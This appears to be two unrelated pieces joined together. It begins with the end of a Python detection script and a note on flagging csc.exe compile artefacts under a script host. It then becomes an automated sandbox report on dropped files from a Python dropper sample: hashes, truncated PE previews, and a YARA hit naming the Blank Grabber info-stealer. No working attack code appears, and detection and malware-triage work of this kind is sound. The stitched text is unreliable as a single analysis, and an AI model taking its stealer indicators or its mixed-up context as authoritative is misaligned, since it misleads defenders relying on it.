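        reasons.append("parent is a script host")
    return reasons


def scan(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (image, reasons) for every event with at least one reason."""
    hits = []
    for ev in events:
        reasons = suspicious_compile(ev)
        if reasons:
            hits.append((basename(ev["Image"]), reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in scan(EVENTS):
        print(image, "->", "; ".join(reasons))
```

The cvtres.exe event is caught by path and artefact names alone because its parent is csc.exe, not the script host; a rule keyed only on the parent relationship would miss the second stage, which is why the artefact pattern is worth keeping. Legitimate Add-Type use by admin scripts produces the same artefacts, so treat the hit as a pivot to the parent PowerShell command line (Base64-encoded in this sample) rather than as a verdict.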
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):109392
                                                          Entropy (8bit):6.641929675972235
                                                          Encrypted:false
                                                          SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                          MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                          SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                          SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                          SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: mav17final.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exe, Detection: malicious, Browse
                                                          • Filename: access_version_x32-64_pack.exe, Detection: malicious, Browse
                                                          • Filename: , Detection: malicious, Browse
                                                          • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                          • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                          • Filename: DeltaX.exe, Detection: malicious, Browse
                                                          • Filename: Arceus.exe, Detection: malicious, Browse
                                                          • Filename: DeltaX.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):49432
                                                          Entropy (8bit):7.811739787042456
                                                          Encrypted:false
                                                          SSDEEP:768:XulhAbgFQ1/NGSS1xNDrxiRx8/CWpsVDIA35/Mw3kp0HIPCVnRn5YiSyvYPxWEu:XiGgF1TxbYecf5UcHIPCVnv7SyQPx
                                                          MD5:2D461B41F6E9A305DDE68E9C59E4110A
                                                          SHA1:97C2266F47A651E37A72C153116D81D93C7556E8
                                                          SHA-256:ABBE3933A34A9653A757244E8E55B0D7D3A108527A3E9E8A7F2013B5F2A9EFF4
                                                          SHA-512:EEF132DF6E52EB783BAD3E6AF0D57CB48CDA2EB0EDB6E282753B02D21970C1EEA6BAB03C835FF9F28F2D3E25F5E9E18F176A8C5680522C09DA358A1C48CF14C8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: MethodReveal.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Python.Muldrop.18.11526.25283.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Python.Muldrop.18.11526.25283.exe, Detection: malicious, Browse
                                                          • Filename: F-M-E.exe, Detection: malicious, Browse
                                                          • Filename: Electron_V6.exe, Detection: malicious, Browse
                                                          • Filename: Nezur_V2.exe, Detection: malicious, Browse
                                                          • Filename: Molasses.exe, Detection: malicious, Browse
                                                          • Filename: x8Rh3L1DiO.exe, Detection: malicious, Browse
                                                          • Filename: Galaxy.exe, Detection: malicious, Browse
                                                          • Filename: f1.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):59664
                                                          Entropy (8bit):7.830958327898146
                                                          Encrypted:false
                                                          SSDEEP:1536:UUOlRJUIp/i+OnIlnhKaK+DIKIPLP3n7SySPxH9F:pOpnomln0aK+0KIPLP3nUxdF
                                                          MD5:1ADFE4D0F4D68C9C539489B89717984D
                                                          SHA1:8AE31B831B3160F5B88DDA58AD3959C7423F8EB2
                                                          SHA-256:64E8FD952CCF5B8ADCA80CE8C7BC6C96EC7DF381789256FE8D326F111F02E95C
                                                          SHA-512:B403CC46E0874A75E3C0819784244ED6557EAE19B0D76FFD86F56B3739DB10EA8DEEC3DC1CA9E94C101263D0CCF506978443085A70C3AB0816885046B5EF5117
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):109328
                                                          Entropy (8bit):7.929995437995477
                                                          Encrypted:false
                                                          SSDEEP:3072:rAXWq+Shd+pVgLxCmdrrrvYoVZPQxqrU1uIPOqpCT6x1:Q+Smip7YwVQsrU1nCq
                                                          MD5:A8952538E090E2FF0EFB0BA3C890CD04
                                                          SHA1:CDC8BD05A3178A95416E1C15B6C875EE026274DF
                                                          SHA-256:C4E8740C5DBBD2741FC4124908DA4B65FA9C3E17D9C9BF3F634710202E0C7009
                                                          SHA-512:5C16F595F17BEDAA9C1FDD14C724BBB404ED59421C63F6FBD3BFD54CE8D6F550147D419EC0430D008C91B01B0C42934C2A08DAE844C308FEEC077DA713AC842E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".p.......... ........................................0............`..........................................,..P....)....... ...........&...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36120
                                                          Entropy (8bit):7.694581667669348
                                                          Encrypted:false
                                                          SSDEEP:768:5rusWqAYiGR2VL0gdxwxpj9bTIPOICR5YiSyv4PxWEu:5ynqA/dL0gdxwX9bTIPOICf7SygPx
                                                          MD5:F10D896ED25751EAD72D8B03E404EA36
                                                          SHA1:EB8E0FD6E2356F76B5EA0CB72AB37399EC9D8ECB
                                                          SHA-256:3660B985CA47CA1BBA07DB01458B3153E4E692EE57A8B23CE22F1A5CA18707C3
                                                          SHA-512:7F234E0D197BA48396FABD1FCCC2F19E5D4AD922A2B3FE62920CD485E5065B66813B4B2A2477D2F7F911004E1BC6E5A6EC5E873D8FF81E642FEE9E77B428FB42
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".P........... .......................................@............`..........................................;..P....9.......0..........,............;.......................................,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):87824
                                                          Entropy (8bit):7.919149468371103
                                                          Encrypted:false
                                                          SSDEEP:1536:AUZZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6VWLZLpIPZ1887SyKPxN:AIvA5utzWfXE0V0ZK+K+QLHIPZ188ExN
                                                          MD5:3798175FD77EDED46A8AF6B03C5E5F6D
                                                          SHA1:F637EAF42080DCC620642400571473A3FDF9174F
                                                          SHA-256:3C9D5A9433B22538FC64141CD3784800C567C18E4379003329CF69A1D59B2A41
                                                          SHA-512:1F7351C9E905265625D725551D8EA1DE5D9999BC333D29E6510A5BCA4E4D7C1472B2A637E892A485A7437EA4768329E5365B209DD39D7C1995FE3317DC5AECDF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):26384
                                                          Entropy (8bit):7.48274363176083
                                                          Encrypted:false
                                                          SSDEEP:384:r0Psz9rLZgNhzHjlHv0vFTMwZa7gJXTDIPQUCNQHQIYiSy1pCQqIPxh8E9VF0Nyo:RihFP0tTHpDDIPQUCI5YiSyv3PxWEun
                                                          MD5:DECDABACA104520549B0F66C136A9DC1
                                                          SHA1:423E6F3100013E5A2C97E65E94834B1B18770A87
                                                          SHA-256:9D4880F7D0129B1DE95BECD8EA8BBBF0C044D63E87764D18F9EC00D382E43F84
                                                          SHA-512:D89EE3779BF7D446514FC712DAFB3EBC09069E4F665529A7A1AF6494F8955CEB040BEF7D18F017BCC3B6FE7ADDEAB104535655971BE6EED38D0FC09EC2C37D88
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1...0...1...4...1...5...1...2...1.~.0...1...0...1...0...1.~.<...1.~.1...1.~.....1.~.3...1.Rich..1.........PE..d......d.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):44312
                                                          Entropy (8bit):7.711982997288045
                                                          Encrypted:false
                                                          SSDEEP:768:fLQ8MABQVeC50swbKjNcoVApXo2gwl49wMvfscpZTfIPLwnFW5YiSyvhPxWEu:zTIt50swZoKp929fsiTfIPLwnFs7SyZ5
                                                          MD5:BCC3E26A18D59D76FD6CF7CD64E9E14D
                                                          SHA1:B85E4E7D300DBEEC942CB44E4A38F2C6314D3166
                                                          SHA-256:4E19F29266A3D6C127E5E8DE01D2C9B68BC55075DD3D6AABE22CF0DE4B946A98
                                                          SHA-512:65026247806FEAB6E1E5BF2B29A439BDC1543977C1457F6D3DDFBB7684E04F11ABA10D58CC5E7EA0C2F07C8EB3C9B1C8A3668D7854A9A6E4340E6D3E43543B74
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):57616
                                                          Entropy (8bit):7.828956573011499
                                                          Encrypted:false
                                                          SSDEEP:1536:vUoHNtQh2qxFtxAnHq70rF7VRUjCpcIPOQ397SyU8Pxp:vUiNtQhxAnMORUmOIPOQ39xxp
                                                          MD5:EB6313B94292C827A5758EEA82D018D9
                                                          SHA1:7070F715D088C669EDA130D0F15E4E4E9C4B7961
                                                          SHA-256:6B41DFD7D6AC12AFE523D74A68F8BD984A75E438DCF2DAA23A1F934CA02E89DA
                                                          SHA-512:23BFC3ABF71B04CCFFC51CEDF301FADB038C458C06D14592BF1198B61758810636D9BBAC9E4188E72927B49CB490AEAFA313A04E3460C3FB4F22BDDDF112AE56
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................n.....M.......M.......M.......M.......M...............I..............................................Rich....................PE..d...%..d.........." ...".........`.......p...................................0............`..........................................+..P....)....... .......................+..$.......................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):63760
                                                          Entropy (8bit):7.859117864085156
                                                          Encrypted:false
                                                          SSDEEP:1536:NHBhG6a7BLI9d70XIKNSTuGaLOIPC7s0K7Sy1Pxd:/hI67uIKNSTICIPC7sBDxd
                                                          MD5:2089768E25606262921E4424A590FF05
                                                          SHA1:BC94A8FF462547AB48C2FBF705673A1552545B76
                                                          SHA-256:3E6E9FC56E1A9FE5EDB39EE03E5D47FA0E3F6ADB17BE1F087DC6F891D3B0BBCA
                                                          SHA-512:371AA8E5C722307FFF65E00968B14280EE5046CFCF4A1D9522450688D75A3B0362F2C9EC0EC117B2FC566664F2F52A1B47FE62F28466488163F9F0F1CE367F86
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."..................................................................`.........................................p...d....................P..........................................................@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):1438373
                                                          Entropy (8bit):5.59108786847922
                                                          Encrypted:false
                                                          SSDEEP:24576:mQR5pATu7xm4lUKdcubgAnyfbcZ0iwhBdYf9P3sRHHL:mQR5plxmQJy
                                                          MD5:2F6D57BCCF7F7735ACB884A980410F6A
                                                          SHA1:93A6926887A08DC09CD92864CD82B2BEC7B24EC5
                                                          SHA-256:1B7D326BAD406E96A4C83B5A49714819467E3174ED0A74F81C9EBD96D1DD40B3
                                                          SHA-512:95BCFC66DBE7B6AD324BD2DC2258A3366A3594BFC50118AB37A2A204906109E42192FB10A91172B340CC28C12640513DB268C854947FB9ED8426F214FF8889B4
                                                          Malicious:false
                                                          Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):118175
                                                          Entropy (8bit):7.65575928005811
                                                          Encrypted:false
                                                          SSDEEP:3072:AaByPjus5PADzdH5NlaFXb8mZJfd/hG/mk1HU6s:As2+z55SFXImZn/MR1HU6s
                                                          MD5:FA9BB524DA315BEC7B439405041FE8CB
                                                          SHA1:FF865E7C48DB9DEC20A4B0AE4E04D5C7592A16A6
                                                          SHA-256:313A1C0B7FE64657F7A6C7ABE6FDEC6EF5650628563559BB6A8510ECB930A866
                                                          SHA-512:66277003DFC12284522511D647C418AF6F4D43465DF013C7A0EBCB906DCC16A6E2C40A64F7D457593393955EDCC37EAA490F4238E1E3EB3070DD61067DFE0F0D
                                                          Malicious:false
                                                          Preview:PK........c'wX;..)...).......stub-o.pyc........{E.e..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1192216
                                                          Entropy (8bit):7.944105809686233
                                                          Encrypted:false
                                                          SSDEEP:24576:OehIVnK0yupAu74grd7gqiAtpzdZveNuKF1CPwDv3uFfJR:SYupAm7d7gqNtpzzveNuM1CPwDv3uFff
                                                          MD5:DFFCAB08F94E627DE159E5B27326D2FC
                                                          SHA1:AB8954E9AE94AE76067E5A0B1DF074BCCC7C3B68
                                                          SHA-256:135B115E77479EEDD908D7A782E004ECE6DD900BB1CA05CC1260D5DD6273EF15
                                                          SHA-512:57E175A5883EDB781CDB2286167D027FDB4B762F41FB1FC9BD26B5544096A9C5DDA7BCCBB6795DCC37ED5D8D03DC0A406BF1A59ADB3AEB41714F1A7C8901A17D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ...".........`%..U5..p%...................................7...........`......................................... x5......s5.h....p5......p2..............x7......................................`5.@...........................................UPX0.....`%.............................UPX1.........p%.....................@....rsrc........p5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):29968
                                                          Entropy (8bit):7.677818197322094
                                                          Encrypted:false
                                                          SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                          MD5:08B000C3D990BC018FCB91A1E175E06E
                                                          SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                          SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                          SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):209688
                                                          Entropy (8bit):7.925110241108709
                                                          Encrypted:false
                                                          SSDEEP:3072:de9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNI2DglFjEW0wuDmxD:A99u/XRxpK8M111nEE0iGYzi9jd0wN
                                                          MD5:8E8A145E122A593AF7D6CDE06D2BB89F
                                                          SHA1:B0E7D78BB78108D407239E9F1B376E0C8C295175
                                                          SHA-256:A6A14C1BECCBD4128763E78C3EC588F747640297FFB3CC5604A9728E8EF246B1
                                                          SHA-512:D104D81ACA91C067F2D69FD8CEC3F974D23FB5372A8F2752AD64391DA3DBF5FFE36E2645A18A9A74B70B25462D73D9EA084318846B7646D39CE1D3E65A1C47C4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".....P...`..p....p................................................`..........................................6..4@...3.......0...........N...........v......................................p&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1699608
                                                          Entropy (8bit):7.993586114049122
                                                          Encrypted:true
                                                          SSDEEP:24576:IzvTIooNigMzmPPExBYeZ0pqJx5F7vYNBw5K2RH9lVggq4lUTNeTVZXo3uYIPDhh:C9oNizvxB3ZAEx5ONCVwXUmeTVlv
                                                          MD5:5792ADEAB1E4414E0129CE7A228EB8B8
                                                          SHA1:E9F022E687B6D88D20EE96D9509F82E916B9EE8C
                                                          SHA-256:7E1370058177D78A415B7ED113CC15472974440D84267FC44CDC5729535E3967
                                                          SHA-512:C8298B5780A2A5EEBED070AC296EDA6902B0CAC9FDA7BB70E21F482D6693D6D2631CA1AC4BE96B75AC0DD50C9CA35BE5D0ACA9C4586BA7E58021EDCCD482958B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.d0............^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):630736
                                                          Entropy (8bit):6.409476333013752
                                                          Encrypted:false
                                                          SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                          MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                          SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                          SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                          SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):456
                                                          Entropy (8bit):4.447296373872587
                                                          Encrypted:false
                                                          SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                          MD5:4531984CAD7DACF24C086830068C4ABE
                                                          SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                          SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                          SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, Author: Joe Security
                                                          Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):26384
                                                          Entropy (8bit):7.438368098774459
                                                          Encrypted:false
                                                          SSDEEP:768:UjW1JOQuL3pJbNIPQGCF5YiSyvnnPxWEuN:UjW1AnbNIPQGCL7SyvnPxa
                                                          MD5:90FEA71C9828751E36C00168B9BA4B2B
                                                          SHA1:15B506DF7D02612E3BA49F816757AD0C141E9DC1
                                                          SHA-256:5BBBB4F0B4F9E5329BA1D518D6E8144B1F7D83E2D7EAF6C50EEF6A304D78F37D
                                                          SHA-512:E424BE422BF0EF06E7F9FF21E844A84212BFA08D7F9FBD4490CBBCB6493CC38CC1223AAF8B7C9CD637323B81EE93600D107CC1C982A2288EB2A0F80E2AD1F3C5
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
